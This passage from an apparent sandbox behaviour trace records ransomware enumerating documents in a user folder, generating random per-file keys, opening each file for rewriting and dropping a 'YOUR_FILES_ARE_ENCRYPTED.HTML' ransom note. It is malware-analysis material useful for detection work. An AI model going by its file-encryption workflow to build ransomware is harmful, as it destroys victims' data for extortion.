out: param_1="18") returned 2 [0166.743] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="9E") returned 2 [0166.743] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="2C") returned 2 [0166.743] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="47") returned 2 [0166.743] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="A0") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="C8") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="A4") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="10") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="55") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="4D") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: 
param_1="A9") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="F0") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="43") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="1A") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="B4") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="A6") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="68") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="27") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="FD") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="65") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="84") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="A8") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="4A") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="EF") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="07") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="04") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="92") returned 2 [0166.744] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="03") returned 2 [0166.745] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="90") returned 2 [0166.745] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="41") returned 2 [0166.745] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps" [0166.745] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.746] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.751] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7d3a260, ftCreationTime.dwHighDateTime=0x1d7dc7a, ftLastAccessTime.dwLowDateTime=0x444b69a0, ftLastAccessTime.dwHighDateTime=0x1d7dfd5, ftLastWriteTime.dwLowDateTime=0x444b69a0, ftLastWriteTime.dwHighDateTime=0x1d7dfd5, nFileSizeHigh=0x0, nFileSizeLow=0x15958, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="pvCfs20yr.ods", cAlternateFileName="PVCFS2~1.ODS")) returned 1 [0166.752] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods") returned 75 [0166.755] lstrcmpW (lpString1="pvCfs20yr.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.755] PathFindExtensionW (pszPath="pvCfs20yr.ods") returned=".ods" [0166.755] lstrlenW (lpString=".ods") returned 4 [0166.755] PathFindExtensionW (pszPath="pvCfs20yr.ods") returned=".ods" [0166.755] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\pvcfs20yr.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.755] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=88408) returned 1 [0166.756] GetProcessHeap () returned 0x270000 [0166.756] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.756] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="25") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="D7") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="72") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="F9") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="A5") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="9E") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="93") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="F2") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="13") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="C4") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="F9") returned 2 [0166.756] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="FE") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="18") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="4F") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="28") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="BA") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="69") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="D1") returned 2 [0166.757] wsprintfW (in: 
param_1=0x4ebd772, param_2="%02X" | out: param_1="2A") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="7B") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="71") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="61") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="1B") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="F8") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="22") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="83") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="80") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="DE") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="C5") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="17") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="C4") returned 2 [0166.757] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="55") returned 2 [0166.758] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\pvCfs20yr.ods" [0166.758] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.758] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.762] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe019f7d0, ftCreationTime.dwHighDateTime=0x1d7e051, ftLastAccessTime.dwLowDateTime=0x5e55a470, ftLastAccessTime.dwHighDateTime=0x1d7e13b, ftLastWriteTime.dwLowDateTime=0x5e55a470, ftLastWriteTime.dwHighDateTime=0x1d7e13b, nFileSizeHigh=0x0, nFileSizeLow=0x170e7, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="T95w62znp uj L6ih.pdf", cAlternateFileName="T95W62~1.PDF")) returned 1 [0166.765] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf") returned 83 [0166.765] lstrcmpW (lpString1="T95w62znp uj L6ih.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.765] PathFindExtensionW (pszPath="T95w62znp uj L6ih.pdf") returned=".pdf" [0166.765] lstrlenW (lpString=".pdf") returned 4 [0166.765] PathFindExtensionW (pszPath="T95w62znp uj L6ih.pdf") returned=".pdf" [0166.765] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\t95w62znp uj l6ih.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.766] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=94439) returned 1 [0166.766] GetProcessHeap () returned 0x270000 [0166.766] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.767] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="3A") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="9A") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd732, 
param_2="%02X" | out: param_1="51") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="67") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="57") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="A4") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="77") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="E8") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="49") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="3C") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="1A") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="F8") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="F3") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="52") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="BF") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="2A") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="F3") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="00") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="B2") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="39") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="89") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AD") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="63") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="26") returned 2 [0166.767] wsprintfW 
(in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="B1") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="F3") returned 2 [0166.767] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="87") returned 2 [0166.768] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="D7") returned 2 [0166.768] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="1E") returned 2 [0166.768] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="C8") returned 2 [0166.768] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="D7") returned 2 [0166.768] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="4B") returned 2 [0166.768] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\T95w62znp uj L6ih.pdf" [0166.768] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.768] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.778] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe019f7d0, ftCreationTime.dwHighDateTime=0x1d7e051, ftLastAccessTime.dwLowDateTime=0x5e55a470, ftLastAccessTime.dwHighDateTime=0x1d7e13b, ftLastWriteTime.dwLowDateTime=0x5e55a470, ftLastWriteTime.dwHighDateTime=0x1d7e13b, nFileSizeHigh=0x0, nFileSizeLow=0x170e7, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="T95w62znp uj L6ih.pdf", cAlternateFileName="T95W62~1.PDF")) returned 0 [0166.778] FindClose (in: hFindFile=0x42f31c0 | out: 
hFindFile=0x42f31c0) returned 1 [0166.778] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0166.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\fimjs52rrmmi4d7w\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0166.779] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0166.780] CloseHandle (hObject=0x5b0) returned 1 [0166.781] GetProcessHeap () returned 0x270000 [0166.782] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0166.782] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f4aef40, ftCreationTime.dwHighDateTime=0x1d7e273, ftLastAccessTime.dwLowDateTime=0x19e6c680, ftLastAccessTime.dwHighDateTime=0x1d7e2ed, ftLastWriteTime.dwLowDateTime=0x19e6c680, ftLastWriteTime.dwHighDateTime=0x1d7e2ed, nFileSizeHigh=0x0, nFileSizeLow=0x8f14, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="l2acllWy_sU3eMTRQEp.xlsx", cAlternateFileName="L2ACLL~1.XLS")) returned 1 [0166.782] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx") returned 69 [0166.782] lstrcmpW (lpString1="l2acllWy_sU3eMTRQEp.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.782] PathFindExtensionW 
(pszPath="l2acllWy_sU3eMTRQEp.xlsx") returned=".xlsx" [0166.782] lstrlenW (lpString=".xlsx") returned 5 [0166.782] PathFindExtensionW (pszPath="l2acllWy_sU3eMTRQEp.xlsx") returned=".xlsx" [0166.782] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\l2acllwy_su3emtrqep.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0166.783] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=36628) returned 1 [0166.783] GetProcessHeap () returned 0x270000 [0166.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.784] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="1D") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="AB") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="52") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="EB") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="8D") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F9") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="54") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="3F") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="C1") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A2") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6C") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda62, 
param_2="%02X" | out: param_1="29") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="4E") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="08") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DA") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="5E") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="39") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="B1") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="D9") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F2") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="E6") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="7D") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="45") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="B7") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="92") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="1C") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="1E") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="D6") returned 2 [0166.784] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="AA") returned 2 [0166.785] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C5") returned 2 [0166.785] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="80") returned 2 [0166.785] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="38") returned 2 [0166.785] lstrcpyW (in: lpString1=0x76a00bc, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\l2acllWy_sU3eMTRQEp.xlsx" [0166.785] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.785] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.787] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb73b2bf0, ftCreationTime.dwHighDateTime=0x1d7da56, ftLastAccessTime.dwLowDateTime=0xc4dd23a0, ftLastAccessTime.dwHighDateTime=0x1d7e6f2, ftLastWriteTime.dwLowDateTime=0xc4dd23a0, ftLastWriteTime.dwHighDateTime=0x1d7e6f2, nFileSizeHigh=0x0, nFileSizeLow=0xe7a2, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="Ll53vn KF.rtf", cAlternateFileName="LL53VN~1.RTF")) returned 1 [0166.787] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf") returned 58 [0166.787] lstrcmpW (lpString1="Ll53vn KF.rtf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.787] PathFindExtensionW (pszPath="Ll53vn KF.rtf") returned=".rtf" [0166.787] lstrlenW (lpString=".rtf") returned 4 [0166.787] PathFindExtensionW (pszPath="Ll53vn KF.rtf") returned=".rtf" [0166.787] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\Ll53vn KF.rtf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\ll53vn kf.rtf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.792] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=59298) returned 1 [0166.796] GetProcessHeap () returned 0x270000 [0166.796] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.797] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="E2") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="2A") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C0") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="0E") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="85") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F6") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="9D") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="E7") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="71") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="7C") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="D4") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="6D") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="0A") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="9E") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="91") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="37") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="68") returned 2 [0166.798] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="C8") returned 2 [0166.799] wsprintfW (in: 
